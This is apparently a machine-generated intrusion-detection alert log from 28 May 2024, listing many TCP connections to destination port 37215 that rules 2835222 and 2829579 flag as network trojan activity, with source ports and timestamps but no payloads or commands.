          SID:2835222
          Source Port:44690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.653061
          SID:2829579
          Source Port:34720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.566489
          SID:2829579
          Source Port:46012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.677682
          SID:2829579
          Source Port:36330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.514234
          SID:2835222
          Source Port:46446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681100
          SID:2829579
          Source Port:37110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803844
          SID:2835222
          Source Port:48834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511626
          SID:2829579
          Source Port:60138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.871121
          SID:2829579
          Source Port:42428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164989
          SID:2835222
          Source Port:59526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667790
          SID:2829579
          Source Port:34556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.242640
          SID:2835222
          Source Port:49818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291478
          SID:2829579
          Source Port:57594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.183670
          SID:2829579
          Source Port:37680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530289
          SID:2829579
          Source Port:34052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.229363
          SID:2829579
          Source Port:40412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338564
          SID:2829579
          Source Port:43742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.974032
          SID:2829579
          Source Port:57782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.434883
          SID:2835222
          Source Port:44006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.730259
          SID:2835222
          Source Port:49752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543497
          SID:2829579
          Source Port:35536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.278139
          SID:2829579
          Source Port:52690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868959
          SID:2835222
          Source Port:58384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152063
          SID:2835222
          Source Port:45290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339666
          SID:2835222
          Source Port:39472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431338
          SID:2829579
          Source Port:58350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.493259
          SID:2829579
          Source Port:50420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126518
          SID:2829579
          Source Port:48998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960332
          SID:2829579
          Source Port:57412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.207034
          SID:2835222
          Source Port:41156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.984382
          SID:2835222
          Source Port:33360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216018
          SID:2829579
          Source Port:56800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846402
          SID:2835222
          Source Port:46836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.011085
          SID:2835222
          Source Port:60420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741679
          SID:2829579
          Source Port:43352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208945
          SID:2835222
          Source Port:33668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266576
          SID:2835222
          Source Port:42826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.628418
          SID:2829579
          Source Port:43134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551767
          SID:2835222
          Source Port:33036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207959
          SID:2835222
          Source Port:54054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326098
          SID:2829579
          Source Port:48448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.979052
          SID:2829579
          Source Port:50166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.919080
          SID:2829579
          Source Port:52536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.041385
          SID:2835222
          Source Port:33294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923640
          SID:2835222
          Source Port:51954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175524
          SID:2829579
          Source Port:50048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979191
          SID:2829579
          Source Port:45466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.850528
          SID:2835222
          Source Port:34008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.589062
          SID:2829579
          Source Port:45210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743684
          SID:2835222
          Source Port:57364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221511
          SID:2829579
          Source Port:50878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156148
          SID:2829579
          Source Port:53522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298318
          SID:2829579
          Source Port:38306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922098
          SID:2835222
          Source Port:39986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064013
          SID:2835222
          Source Port:53164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210188
          SID:2829579
          Source Port:47830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846827
          SID:2835222
          Source Port:45570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.089723
          SID:2829579
          Source Port:40980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211856
          SID:2829579
          Source Port:58166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160156
          SID:2835222
          Source Port:40078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.248248
          SID:2835222
          Source Port:34484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.088076
          SID:2835222
          Source Port:52694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711128
          SID:2835222
          Source Port:34004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191958
          SID:2829579
          Source Port:51890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126486
          SID:2829579
          Source Port:37998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.234555
          SID:2829579
          Source Port:54814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.064875
          SID:2835222
          Source Port:54706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.080798
          SID:2835222
          Source Port:47626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484565
          SID:2829579
          Source Port:50016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230273
          SID:2829579
          Source Port:38216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065148
          SID:2835222
          Source Port:57472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961741
          SID:2829579
          Source Port:51382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669343
          SID:2829579
          Source Port:42706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190369
          SID:2829579
          Source Port:60412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513458
          SID:2835222
          Source Port:60626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334315
          SID:2829579
          Source Port:35734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.169765
          SID:2829579
          Source Port:36598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143863
          SID:2829579
          Source Port:49516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741463
          SID:2829579
          Source Port:52230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.974940
          SID:2829579
          Source Port:56430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797794
          SID:2829579
          Source Port:38134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.859059
          SID:2829579
          Source Port:55238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497449
          SID:2829579
          Source Port:60072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536775
          SID:2829579
          Source Port:39468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485472
          SID:2835222
          Source Port:57468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665495
          SID:2829579
          Source Port:48620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431372
          SID:2835222
          Source Port:56694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.626873
          SID:2829579
          Source Port:56236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.925684
          SID:2829579
          Source Port:48230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666176
          SID:2835222
          Source Port:40642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270397
          SID:2829579
          Source Port:55478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230215
          SID:2835222
          Source Port:60350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350386
          SID:2829579
          Source Port:47646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270264
          SID:2829579
          Source Port:34896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268834
          SID:2829579
          Source Port:54850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664458
          SID:2835222
          Source Port:49784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.559854
          SID:2829579
          Source Port:58890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.925479
          SID:2835222
          Source Port:48936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.239584
          SID:2835222
          Source Port:37730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.935162
          SID:2829579
          Source Port:35308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549134
          SID:2829579
          Source Port:41290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551215
          SID:2835222
          Source Port:38046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.065053
          SID:2829579
          Source Port:52640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.181667
          SID:2829579
          Source Port:48082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876557
          SID:2829579
          Source Port:55352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729512
          SID:2835222
          Source Port:41334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760091
          SID:2835222
          Source Port:41032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.888132
          SID:2835222
          Source Port:49650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.512777
          SID:2835222
          Source Port:51102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297636
          SID:2835222
          Source Port:43940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466337
          SID:2835222
          Source Port:34958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.560484
          SID:2835222
          Source Port:40242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068174
          SID:2835222
          Source Port:45822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474392
          SID:2835222
          Source Port:39752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774502
          SID:2829579
          Source Port:55846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.889914
          SID:2829579
          Source Port:36516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270656
          SID:2835222
          Source Port:40122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336541
          SID:2829579
          Source Port:48628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973116
          SID:2829579
          Source Port:48718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848360
          SID:2835222
          Source Port:56408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.484166
          SID:2835222
          Source Port:40446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953035
          SID:2835222
          Source Port:43124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669518
          SID:2835222
          Source Port:39982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.696902
          SID:2829579
          Source Port:38604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543331
          SID:2829579
          Source Port:51060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156293
          SID:2835222
          Source Port:57908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605632
          SID:2829579
          Source Port:50150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154192
          SID:2829579
          Source Port:33260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103003
          SID:2835222
          Source Port:52548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214864
          SID:2829579
          Source Port:35076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033391
          SID:2829579
          Source Port:57602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.552080
          SID:2835222
          Source Port:52390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.241864
          SID:2829579
          Source Port:59314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437392
          SID:2829579
          Source Port:55912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473753
          SID:2835222
          Source Port:57640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213605
          SID:2835222
          Source Port:49868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764452
          SID:2835222
          Source Port:60856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.623945
          SID:2829579
          Source Port:37672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227566
          SID:2835222
          Source Port:55472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774812
          SID:2835222
          Source Port:48560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838662
          SID:2835222
          Source Port:42082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664655
          SID:2835222
          Source Port:46572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657129
          SID:2835222
          Source Port:49182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543043
          SID:2835222
          Source Port:56078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205682
          SID:2829579
          Source Port:53810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.277979
          SID:2829579
          Source Port:48962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400712
          SID:2829579
          Source Port:48460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142643
          SID:2835222
          Source Port:36546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.559949
          SID:2829579
          Source Port:38082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.913629
          SID:2835222
          Source Port:47436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.691538
          SID:2829579
          Source Port:44044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.812919
          SID:2829579
          Source Port:45516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542668
          SID:2829579
          Source Port:49732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.614642
          SID:2829579
          Source Port:35220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893517
          SID:2829579
          Source Port:46256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.178519
          SID:2835222
          Source Port:54050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287671
          SID:2829579
          Source Port:34568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401051
          SID:2829579
          Source Port:39104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.023024
          SID:2835222
          Source Port:59040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216556
          SID:2835222
          Source Port:48734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.801834
          SID:2829579
          Source Port:45000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112845
          SID:2829579
          Source Port:37562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146219
          SID:2835222
          Source Port:56104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.817610
          SID:2835222
          Source Port:46502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293133
          SID:2829579
          Source Port:43074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656159
          SID:2835222
          Source Port:37636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.066181
          SID:2829579
          Source Port:44644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.225989
          SID:2835222
          Source Port:52528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729072
          SID:2835222
          Source Port:33882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840055
          SID:2835222
          Source Port:55758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736671
          SID:2829579
          Source Port:42154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272375
          SID:2835222
          Source Port:34474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483219
          SID:2829579
          Source Port:40058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223189
          SID:2829579
          Source Port:50408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206780
          SID:2829579
          Source Port:51636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.986087
          SID:2835222
          Source Port:44096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272305
          SID:2835222
          Source Port:43656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473745
          SID:2829579
          Source Port:44068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269147
          SID:2835222
          Source Port:59528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560394
          SID:2829579
          Source Port:56866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338630
          SID:2835222
          Source Port:52184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.920097
          SID:2835222
          Source Port:53284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497552
          SID:2835222
          Source Port:60746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138061
          SID:2835222
          Source Port:34276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268733
          SID:2835222
          Source Port:35708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156221
          SID:2835222
          Source Port:47110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542435
          SID:2829579
          Source Port:47930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.235689
          SID:2829579
          Source Port:58382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336697
          SID:2829579
          Source Port:47668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466398
          SID:2835222
          Source Port:48982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.212736
          SID:2829579
          Source Port:37778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742433
          SID:2829579
          Source Port:56404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214478
          SID:2829579
          Source Port:53466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547552
          SID:2829579
          Source Port:37286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.484730
          SID:2829579
          Source Port:44400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.212717
          SID:2835222
          Source Port:44952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536684
          SID:2829579
          Source Port:48694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855193
          SID:2835222
          Source Port:36186
          Destination Port:37215
